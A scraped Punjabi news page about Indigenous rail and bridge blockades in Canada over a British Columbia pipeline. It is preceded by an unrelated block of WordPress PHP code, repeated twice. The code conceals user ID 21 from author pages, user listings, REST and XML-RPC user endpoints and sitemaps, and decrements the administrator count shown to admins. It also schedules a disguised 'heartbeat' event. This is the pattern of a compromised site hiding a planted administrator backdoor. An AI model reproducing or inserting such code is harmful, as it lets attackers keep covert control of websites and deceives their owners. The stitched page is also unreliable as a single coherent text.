add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਕੈਨੇਡਾ ਸਰਕਾਰ ਅਤੇ ਆਦੀਵਾਸੀ ਵਸੋਂ ਵਿਚਾਲੇ ਟਕਰਾਓ ? - Press Ki Taquat
No Result
View All Result
ਟੋਰਾਂਟੋ, 18 ਫਰਵਰੀ (ਅਮ੍ਰਿਤ ਪਾਲ ਸਿੰਘ ਸਾਹਨੀ) : ਕੈਨੇਡਾ ‘ਚ ਇਨ੍ਹੀਂ ਦਿਨੀਂ ਸਰਕਾਰ ਅਤੇ ਆਦੀਵਾਸੀ (ਇੰਡਿਜਨਸ) ਵਸੋਂ ਦੇ ਕਬੀਲੇ ਟਕਰਾਓ ਦੀ ਸਥਿਤੀ ‘ਚ ਹਨ | ਬਿ੍ਟਿਸ਼ ਕੋਲੰਬੀਆ ‘ਚ ਕੈਨੇਡਾ ਸਰਕਾਰ ਵਲੋਂ ਜ਼ਮੀਨ ‘ਤੇ ਬਣਾਈ ਜਾਣ ਵਾਲੀ ਤੇਲ ਅਤੇ ਗੈਸ ਪਾਈਪ ਲਾਈਨ ਦਾ ਆਦੀਵਾਸੀਆਂ ਵਲੋਂ ਕਰੜਾ ਵਿਰੋਧ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ | ਵਿਰੋਧ ਪ੍ਰਗਟਾਉਣ ਲਈ ਦੇਸ਼ ਦੇ ਕੁਝ ਹਿੱਸਿਆਂ ‘ਚ ਰੇਲ ਮਾਰਗਾਂ ਉੱਪਰ ਧਰਨੇ ਦਿੱਤੇ ਜਾ ਰਹੇ ਹਨ ਜੋ ਬਿ੍ਟਿਸ਼ ਕੋਲੰਬੀਆ ਤੋਂ ਸ਼ੁਰੂ ਹੋਏ ਪਰ ਹਮਦਰਦੀ ਵਜੋਂ ਉਂਟਾਰੀਓ ‘ਚ ਵੀ ਬੀਤੇ ਡੇਢ ਕੁ ਹਫ਼ਤੇ ਤੋਂ ਆਦੀਵਾਸੀਆਂ ਨੇ ਟੋਰਾਂਟੋ ਤੋਂ ਓਟਾਵਾ ਅਤੇ ਮਾਂਟਰੀਅਲ ਵਿਚਕਾਰ ਰੇਲ ਆਵਾਜਾਈ ਠੱਪ ਕੀਤੀ ਹੋਈ ਹੈ | ਇਹ ਵੀ ਕਿ ਨਿਆਗਰਾ ਫਾਲਜ਼ ਵਿਖੇ ਬੀਤੇ ਕੱਲ੍ਹ ਅਮਰੀਕਾ ਨਾਲ ਸਰਹੱਦ ‘ਤੇ ਬਣੇ ਰੇਨਬੋ ਬਰਿੱਜ ਉੱਪਰ ਵੀ ਦੋ ਘੰਟੇ ਧਰਨਾ ਦਿੱਤਾ ਗਿਆ, ਜਿਸ ਨਾਲ ਸੜਕੀ ਆਵਾਜਾਈ ਠੱਪ ਰਹੀ |
ਮੰਤਰੀ ਮਿੱਲਰ ਨੇ ਕਿਹਾ ਹੈ ਕਿ ਸਰਕਾਰ ਵਲੋਂ ਧਰਨਾਕਾਰੀਆਂ ਨੂੰ ਖਦੇੜਨ ਦੀ ਕਾਹਲੀ ਨਹੀਂ ਕੀਤੀ ਜਾ ਸਕਦੀ ਕਿਉਂਕਿ ਬੀਤੇ ਸਮਿਆਂ ਵਿਚ ਸਰਕਾਰਾਂ ਵਲੋਂ ਅਜਿਹਾ ਕੀਤਾ ਜਾਂਦਾ ਰਿਹਾ ਹੈ ਅਤੇ ਪੁਲਿਸ ਤੇ ਆਦੀਵਾਸੀਆਂ ਵਿਚਕਾਰ ਖ਼ੂਨੀ ਟਕਰਾਅ ਹੁੰਦੇ ਰਹੇ ਹਨ | ਇਸੇ ਦੌਰਾਨ ਕੈਨੇਡੀਅਨ ਨੈਸ਼ਨਲ ਰੇਲਵੇ ਅਤੇ ਵੀਆ ਰੇਲ ਵਲੋਂ ਯਾਤਰੀਆਂ ਅਤੇ ਮਾਲ (ਕਾਰਗੋ) ਦੀ ਢੋਆ-ਢੁਆਈ ਬੰਦ ਰੱਖਣ ਦਾ ਫ਼ੈਸਲਾ ਕੀਤਾ ਹੈ | ਧਰਨਿਆਂ ਦੇ ਚੱਲਦਿਆਂ ਰੇਲਾਂ ਰਾਹੀਂ ਯਾਤਰੀ ਅਤੇ ਮਾਲ ਦੀ ਢੋਆ ਢੁਆਈ ਬੁਰੀ ਤਰ੍ਹਾਂ ਪ੍ਰਭਾਵਿਤ ਹੋ ਚੁੱਕੀ ਹੈ ਅਤੇ ਦੇਸ਼ ‘ਚ ਜ਼ਰੂਰੀ ਵਸਤਾਂ ਦੀ ਸਪਲਾਈ ਰੁਕਣ ਅਤੇ ਬਹੁਤ ਸਾਰੇ ਮੁਲਾਜ਼ਮਾਂ ਦੀਆਂ ਨੌਕਰੀਆਂ ਖੁੱਸਣ ਨਾਲ ਆਰਥਿਕ ਸੰਕਟ ਪੈਦਾ ਹੋਣ ਦੇ ਹਾਲਾਤ ਬਣਦੇ ਜਾ ਰਹੇ ਹਨ |
ਅਜਿਹੇ ‘ਚ ਪ੍ਰਧਾਨ ਮੰਤਰੀ ਜਸਟਿਨ ਟਰੂਡੋ ਉੱਪਰ ਸੰਸਦ ‘ਚ ਵਿਰੋਧੀ ਧਿਰ ਦਾ ਦਬਾਅ ਵੱਧ ਰਿਹਾ ਹੈ | ਸ੍ਰੀ ਟਰੂਡੋ ਨੇ ਆਖਿਆ ਕਿ ਉਨ੍ਹਾਂ ਦੀ ਸਰਕਾਰ ਮਸਲੇ ਨੂੰ ਗੱਲਬਾਤ ਰਾਹੀਂ ਹੱਲ ਕਰਨਾ ਚਾਹੁੰਦੀ ਹੈ, ਕਿਉਂਕਿ ਕੈਨੇਡਾ ਅਜਿਹਾ ਦੇਸ਼ ਨਹੀਂ ਹੈ ਜਿੱਥੇ ਕਾਨੂੰਨ ਵਿਵਸਥਾ ਬਣਾਈ ਰੱਖਣ ਲਈ ਰਾਜਨੀਤਕਾਂ ਵਲੋਂ ਪੁਲਿਸ ਨੂੰ ਹੁਕਮ ਕੀਤੇ ਜਾਂਦੇ ਹੋਣ | ਇਸੇ ਦੌਰਾਨ ਸ੍ਰੀ ਟਰੂਡੋ ਨੇ ਇਸੇ ਹਫ਼ਤੇ ਕੀਤਾ ਜਾਣ ਵਾਲਾ ਕੈਰੇਬੀਅਨ ਦੇਸ਼ਾਂ (ਜਮਾਇਕਾ ਅਤੇ ਬਾਰਬੇਡੋਸ) ਦਾ ਸਰਕਾਰੀ ਦੌਰਾ ਰੱਦ ਕਰ ਦਿੱਤਾ ਹੈ |
ਵਿਰੋਧੀ ਧਿਰ ਦਾ ਦੋਸ਼ ਹੈ ਕਿ ਸਰਕਾਰ ਦੀ ਢਿੱਲਮੱਠ ਕਾਰਨ ਧਰਨਾਕਾਰੀਆਂ ਨੂੰ ਉਤਸ਼ਾਹ ਮਿਲ ਰਿਹਾ ਹੈ ਅਤੇ ਦੇਸ਼ ‘ਚ ਕਾਨੂੰਨ ਵਿਵਸਥਾ ਵਿਗੜਨ ਦਾ ਖ਼ਤਰਾ ਵਧਦਾ ਜਾ ਰਿਹਾ ਹੈ |
Post Views: 114
No Result
View All Result